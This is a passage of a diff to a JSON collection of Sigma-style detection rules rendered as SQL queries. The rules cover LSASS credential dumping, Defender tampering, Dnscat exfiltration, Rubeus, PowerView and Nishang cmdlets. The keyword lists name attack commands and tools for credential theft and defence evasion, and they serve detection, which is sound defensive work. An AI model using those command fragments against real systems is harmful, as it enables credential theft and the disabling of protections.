'%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": 
"proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": 
"Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the 
hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + 
"title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. 
As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names 
and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' 
